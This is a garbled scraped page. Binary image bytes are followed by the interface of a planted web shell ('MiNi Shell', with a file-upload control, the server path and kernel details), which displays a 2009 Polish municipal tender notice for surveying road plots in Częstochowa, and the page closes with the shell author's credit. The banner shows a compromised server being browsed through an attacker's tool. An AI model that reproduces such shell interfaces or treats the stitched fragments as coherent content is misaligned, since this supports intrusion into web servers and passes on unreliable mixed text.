JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090805/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090805/266380-N-2009.html

<p class="kh_header"><b>Częstochowa: Realizacja art. 73 ustawy z 13 października 1998r. - Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz. U. Nr 133, poz. 872 ze zm.). w zakresie 6 zadań.</b><br>
<b>Numer ogłoszenia: 266380 - 2009; data zamieszczenia: 05.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Dróg , ul. ks. Jerzego Popiełuszki 4/6, 42-217 Częstochowa, woj. śląskie, tel. 034 3664095, 3664337 wew. 34, faks 034 3664305 wew. 60, 3664337.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzd.czest.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja art. 73 ustawy z 13 października 1998r. - Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz. U. Nr 133, poz. 872 ze zm.). w zakresie 6 zadań..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Temat: Zadanie nr 1
Wykonanie wyrysów do regulacji stanu prawnego w Księgach Wieczystych działek przejętych pod drogę- liczba działek objętych opracowaniem 50.
Wspólny Słownik Zamówień: 71251000-2 
Opis: Zadanie nr 1
Wykonanie wyrysów do regulacji KW działek przejętych pod drogę- liczba działek objętych opracowaniem 50.
Zamawiający nie dopuszcza składania ofert wariantowych. 
Temat: Zadanie nr 2 
Wznowienie granic działek wydzielonych pod drogę publiczną:
Wspólny Słownik Zamówień: 71251000-2 
Opis: Zadanie nr 2 
Wznowienie granic działek: 
- ul. Nastrojowa, działka nr 1213 obr. Gnaszyn Górny km 2 (4 pkt załamań granicy )
- ul. Ikara 3 ( 2 pkt załamań granicy ) 
- ul. Tatrzańska, działki nr 207/1, 208/1, 210/1 obręb Wielki Bór km 6 ( 8 pkt załamań granicy )
Zamawiający nie dopuszcza składania ofert wariantowych. 
Temat: Zadanie nr 3 
wydzielenie działek zajętych pod drogi publiczne w trybie art 73:
Wspólny Słownik Zamówień: 71251000-2 
Opis: Zadanie nr 3 
Wydzielenie działek zajętych pod drogi publiczne w trybie art 73:
- ul. Chopina - działki nr: 41/3, 41/4, 72/1  obręb 290.
działki nr: 16/1, 16/2, 25/1, 25/2, 70/2, 118/2, 207, 161/1, 161/2, 19, 68, 115, 211, 67, 163/1, 163/2, 114/1, obręb 291.
- ul. Gersona - działki nr: 65/1, 67/6, 72/2, 75/4, 76/2 obręb 293, działki nr: 89/2, 93/2  obręb 292.
- ul. Kossaka - działka nr 68 obręb 291.
- ul. Malczewskiego -  działki nr: 145, 197/2, 196/4 obręb 291.
- ul. Mehoffera - działki nr: 113/2, 131/2 obręb 292.
- ul. Zamoyskiego - działki nr 156  obręb 297. 
- ul. Sabinowska - działki nr: 178 obręb 297, działki nr: 143, 130/7 obręb 328. działki nr: 10, 11/1, 22, 24/1, 29, 31, 35 obręb 329, działki nr: 1/4, 1/3, 1/5, 2/1, 4, 5/1, 6 obręb 357, działki nr: 3/1, 3/2, 36/1, 36/2 obręb 358.
- ul. Weteranów - działka nr 2/4 obręb 328.
Zamawiający nie dopuszcza składania ofert wariantowych. 
Temat: Zadanie nr 4
wydzielenie działek zajętych pod drogi publiczne w trybie art 73:
Wspólny Słownik Zamówień: 71251000-2 
Opis: Zadanie nr 4
Wydzielenie działek zajętych pod drogi publiczne w trybie art 73:
- ul. Wichrowa - działka nr 110 obręb Wielki Bór km. 7. 
- ul. Tatrzańska - działka nr 166, 167 obręb Wielki Bór km 6. 
- ul. Łomżyńska -   działka nr 68 obręb Wielki Bór km. 8.
Zamawiający nie dopuszcza składania ofert wariantowych. 
Temat: Zadanie nr 5
wydzielenie działek zajętych pod drogi publiczne w trybie art 73:
Wspólny Słownik Zamówień: 71251000-2 
Opis: Zadanie nr 5
Wydzielenie działek zajętych pod drogi publiczne w trybie art 73:
- ul. Brata Alberta  -  działka nr 36/16 obręb Kiedrzyn km. 7.
- ul. Gruszowa - działki nr: 20/2, 20/1,obręb Kiedrzyn km. 8.
- ul. Św. Rocha - działki nr: 18, 23 obręb 102, 546/1 obręb Grabówka km 5
- ul.  Sikorskiego - działki nr: 16/10, 31, 36 obręb 103.
- ul. Sejmowa - działki nr: 22/29, 28/28, 28/29 50/10 50/11 obręb Kiedrzyn km 6. działki nr: 20/4, 20/5, 20/6 obręb Kiedrzyn km 5.
Zamawiający nie dopuszcza składania ofert wariantowych. 
Temat:Zadanie nr 6
Wydzielenie działek zajętych pod drogi publiczne w trybie art 73:
Wspólny Słownik Zamówień: 71251000-2 
Opis: Zadanie nr 6
Wydzielenie działek zajętych pod drogi publiczne w trybie art 73:
- ul. Bugajska - działki nr; 1/6, 1/7, 1/9, 27 obręb 417, działki: nr 44 i 45 obręb 385
- ul. Wypalanki - działka nr 2 obręb 365. 
- ul. Struga - działki nr: 56/1, 61/1 obręb 341, nr: 3/1, 6/1 obręb 342, nr: 7/1 obręb 343. 
- ul. Limanowskiego -  działki nr: 65, 66 obręb 305.
- Hutników 27, 24 obręb 275
- Al. Wojska Polskiego - działka nr 145/2 obręb 304.
- ul. Spadzista - działki nr: 125, 126/1 obręb 280
Zamawiający nie dopuszcza składania ofert wariantowych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.25.10.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> W tym postępowaniu nie przewiduje się wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Wykonawcy biorący udział w postępowaniu muszą spełnić następujące warunki i potwierdzić ich spełnienie wskazanymi dokumentami lub oświadczeniami (dotyczy wszystkich zadań):
1.WYKAZ OSÓB KTÓRE BĘDĄ WYKONYWAĆ ZAMÓWIENIE - O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy dysponują lub będą dysponować osobami (na umowę o pracę lub umowę cywilnoprawną) posiadającymi uprawnienia w zakresie rozgraniczeń i podziałów nieruchomości. Do oferty należy dołączyć kopie uprawnień zawodowych.
2.AKTUALNY ODPIS Z WŁAŚCIWEGO REJESTRU - Posiada uprawnienia do wykonywania określonej działalności lub czynności i nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004r. - Pzp
3.INFORMACJA Z KRAJOWEGO REJESTRU KARNEGO - art. 24 ust. 1 pkt. 4-8 Pzp - Posiada uprawnienia do wykonywania określonej działalności lub czynności i nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004r. - Pzp
4.INFORMACJA Z KRAJOWEGO REJESTRU KARNEGO - art. 24 ust. 1 pkt. 9 Pzp - Posiada uprawnienia do wykonywania określonej działalności lub czynności i nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004r. - Pzp
5.ZAŚWIADCZENIE Z WŁAŚCIWEGO ORGANU PODATKOWEGO ORAZ ZUS, KRUS - Posiada uprawnienia do wykonywania określonej działalności lub czynności i nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004r. - Pzp
6.WYKAZ WYKONANYCH USŁUG - O udzielenie zamówienia mogą ubiegać się Wykonawcy którzy zrealizowali w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, usługę wydzielenia działek w trybie art.73 dla zadań nr: 3,4,5,6; wznowienia granic dla zadania nr 2 oraz wykonania wyrysów do regulacji Księgi Wieczystej dla zadania nr 1.
Należy wykazać wykonanie tych usług z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia referencji lub innych dokumentów potwierdzających, że usługi zostały wykonane należycie.

Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu:
Sprawdzanie ww. warunków udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń wg zasady spełnia/nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Do oferty należy dołączyć następujące dokumenty lub oświadczenia (dotyczy wszystkich zadań) :
1.Wykaz wykonanych usług - Warunek zostanie uznany za spełniony, jeżeli Wykonawcy załączy do oferty podpisany przez ospbę/y uprawnioną wykaz wykonanych usług z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia referencji lub innych dokumentów potwierdzających, że usługi zostały wykonane należycie.
Wykaz powinien zawierać wykonanie w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia usługi, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, usługę wydzielenia działek w trybie art.73 dla zadań nr: 3,4,5,6, wznowienia granic dla zadania nr 2 oraz wykonania wyrysów do regulacji Księgi Wieczystej dla zadania nr 1.
2.AKTUALNY ODPIS Z WŁAŚCIWEGO REJESTRU - Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3.INFORMACJA Z KRAJOWEGO REJESTRU KARNEGO - art.24 ust.1 pkt 4-8 Pzp. - Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym art.24 ust.1 pkt 4-8 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
4.INFORMACJA Z KRAJOWEGO REJESTRU KARNEGO - art.24 ust.1 pkt 9 Pzp. - Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym art.24 ust.1 pkt 9 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
5.ZAŚWIADCZENIE Z WŁAŚCIWEGO ORGANU PODATKOWEGO ORAZ ZUS, KRUS - Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
6.Oświadczenie z art.22 ust.1 ustawy-Pzp - Złożenie oświadczenia o spełnianiu warunków określonych w art.22 ust.1 ustawy Prawo zamówień publicznych
7.Wykaz osób które będą wykonywać zamówienie -Do oferty na potwierdzenie spełnienia warunku należy załączyć wykaz potwierdzający, iż Wykonawca dysponuje lub będzie dysponował osobami (na umowę o pracę lub umowę cywilnoprawną) posiadającą uprawnienia w zakresie rozgraniczeń i podziałów nieruchomości. Do oferty należy dołączyć dołączyć kopie uprawnień zawodowych..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.mzd.czest.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Formularz zawierający Specyfikację Istotnych Warunków Zamówienia w cenie 17.70 zł (BRUTTO) można otrzymać w siedzibie Zamawiającego w pokoju 34.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.08.2009 godzina 09:30, miejsce: Oferty należy składać siedzibie Zamawiającego, pokój nr 28.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com